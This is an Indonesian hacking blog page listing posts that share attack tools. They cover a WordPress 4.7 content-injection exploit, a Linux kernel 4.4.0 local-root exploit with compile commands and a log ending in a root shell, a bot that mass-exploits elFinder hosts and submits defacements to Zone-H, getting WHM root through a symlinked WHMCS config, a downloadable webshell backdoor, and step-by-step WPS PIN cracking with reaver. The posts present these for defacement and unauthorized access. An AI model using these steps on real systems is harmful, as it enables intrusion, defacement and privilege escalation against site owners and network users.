LinuxSec Exploit

Nothing is Ever Locked

Exploit

WordPress 4.7.0/4.7.1 Content Injection Exploit

by Jack Wilder 4 Comments

Celah ini menginfeksi  WordPress REST API yang ditambahkan secara default pada WordPress 4.7.0. Salahsatu API tersebut memungkinkan kita mengupdate menghapus mengedit dan menambahkan konten di WordPress. Sayangnya fitur ini malah memiliki celah yangmana pengunjung situs yang bukan admin pun dapat mengupdate konten website melalui API tersebut.

Untuk detail lebih jauh cek di
https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
Exploit :
WordPress 4.7.0/4.7.1 – Unauthenticated Content Injection (Ruby)
Edit seperlunya di bagian Title dan Post
Jika error pas run ruby, install rest-client dulu.
sudo gem install rest-client
Lalu jalankan lagi exploit nya.

Linux Kernel 4.4.0 Race Condition Privilege Escalation

by Jack Wilder 2 Comments

Yo, Kali ini cuma mau share localroot yang barusaja dipublish beberapa hari yang lalu. Localroot ini menyerang kernel 4.4.0 yang berarti vuln di Ubuntu 14.04 dan Ubuntu 16.04.

Kernel yang sudah di test :
  • Ubuntu 16.04: 4.4.0-51-generic
  • Ubuntu 16.04: 4.4.0-47-generic
  • Ubuntu 16.04: 4.4.0-36-generic
  • Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu

Kemungkinan localroot ini juga berlaku untuk mendapatkan hak akses root di kernel yang lebih tua dari 4.4.0 . Jadi silahkan di test sendiri saja.
Log :

retrying stage..
new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 133577, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don’t do that.
closing socket and verifying…….
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root),1000(user)

Cara compile :

gcc chocobo_root.c -o chocobo_root -lpthread
./chocobo_root

Oke sekian artikel kali ini, see you next time.

Bot Bing Dorker + Auto Exploit + Zone-H Submit Exploit elFinder Hosting Nazuka

by Jack Wilder 7 Comments

Haloo guys. Kali ini ane mau share bot bing dorker + auto exploit + zone-h submit untuk exploit elfinder di hostig nazuka. Jadi tinggal masukkan dork bing nya, tinggal coli, dan biarkan bot yang bekerja. Biar rata sekalian hahaha 😀 .

Pertama tau exploit ini sebenernya 4 hari yang lalu, di grup chat Jancok Security.
Yup, hosting gratis nazuka ternyata menyimpan “backdoor” yang cukup fatal di lokasi /_file-manager/php/connector.php . Bakal dapet banyak kalo niat deface.
Tapi pas baca, saya gak tertarik samasekali . Maklum, saya sudah gak minat sama deface deface. Cuman tadi mau nyari berita di zone-h kok banyak arsip hosting nazuka, jadi kepikiran buat bot nya.

Untuk script nya bisa download disini :
Sebelumnya thanks banget buat Mr.MaGnoM, atas referensi bing dorker nya. Big respect bro 🙂
Oh iya, disini ada beberapa parameter yang harus diubah.

$zh = “zafk1el”; 

Itu nick zone-h. Silahkan diganti sendiri ya.
Lalu bagian 

$isi_nama_doang = 

Yang di encode tersebut script deface . Jadi silahkan diganti dengan cara encode terlebih dahulu script deface kalian ke base64 lalu masukkan kesitu.
Cara pakainya gimana bang ?
Gampang banget. 
Tinggal masukkan perintah
php namafile.php
Lalu enter. Selanjutnya masukkan bing dork nya.
PS : Ini CLI based, bukan web based. Dan juga ini BING dorker, jadi jangan pakai dork google. 
Thanks.

Get Root WHM via WHMCS Config Symlink 2016

by Jack Wilder 1 Comment

Yoo! Kali ini kita akan share tutorial mendapatkan akses WHM root dari WHMCS Config Symlink 2016. Langsung saja ke tutorial daripada kelamaan. Haha..
Tool

Intinya sih cari config dari whmcs nya “configuration.php” pinter” aja cari tempatnya ^^

Langsung liat aja videonya

Oke sekian. Kalo ada pertanyaan komen aja.

Download Shell Backdoor Indoxploit V.2

by Jack Wilder 2 Comments

Oke kali ini kita bahas webshell yang cukup populer di kalangan defacer yaitu shell Indoxploit. Meski tergolong shell baru, namun sudah banyak pemakainya, alasannya karena fitur auto nya yang lumayan, tampilan elegan, dan shell ini dishare dengan kode utuk alias tidak diencode. Jadi kalian bisa pastikan sendiri jika shell ini memang bebas log. [Read more…] about Download Shell Backdoor Indoxploit V.2

Hack Andromax MIFI

by Jack Wilder 12 Comments

haii saya temennya nyudnyud wkwkw numpang share cara “Hack Andromax MIFI”
langsung saja kita cus 😀
Pertama kita aktifkan interface monitor

buka terminal lalu ketik

airmon-ng start wlan0
kenapa wlan0 ??
karena interface yg saya gunakan adalah wlan0 cek saja dengan ketik ifconfig untuk cek interface yg tersedia
bila muncul
WARNING: unable to start monitor mode, please run “airmon-ng check kill
ya tinggal ketik saja 
airmon-ng check kill
setelah itu ketik airmon-ng start wlan0 untuk mengaktifkan mode monitor wlan0
dan setelah itu muncul tulisan
monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon
maka interface mode monitornya adalah wlan0mon jadi kita akan gunakan wlan0mon
lalu kita gunakan wash untuk scan bahwa wps di lock atau tidak karena celahnya terletak pada wps yg tidak di lock
kita juga bisa hack wifi lain selain andromax wifi ya tapi tergantung dari AP nya juga dan keamanannya
dan cara menggunakan wash
wash -i wlan0mon
wlan0mon adalah inteface monitor yg telah di buat tadi
tunggu sebentar…
dan kelihatan wifi yg jadi korban
bila sudah terlihat pencet saja ctrl+c
setelah itu copy “mac address” nya dan lihat channel nya agar mudah
lalu kita ketikan
reaver -i wlan0mon -b (mac address yg di copy tadi) -c (channel dari wifi) -vv -K 1
bila muncul WPS pin not found!
kita coba terus”an
dan dapet deh
untuk patch nya kita disable fitur wps nya ^^

masih bingung ??
tonton videonya aja dah

(adsbygoogle = window.adsbygoogle || []).push({});

Powered by WordPress and Genesis Framework. Style by LinuxSec.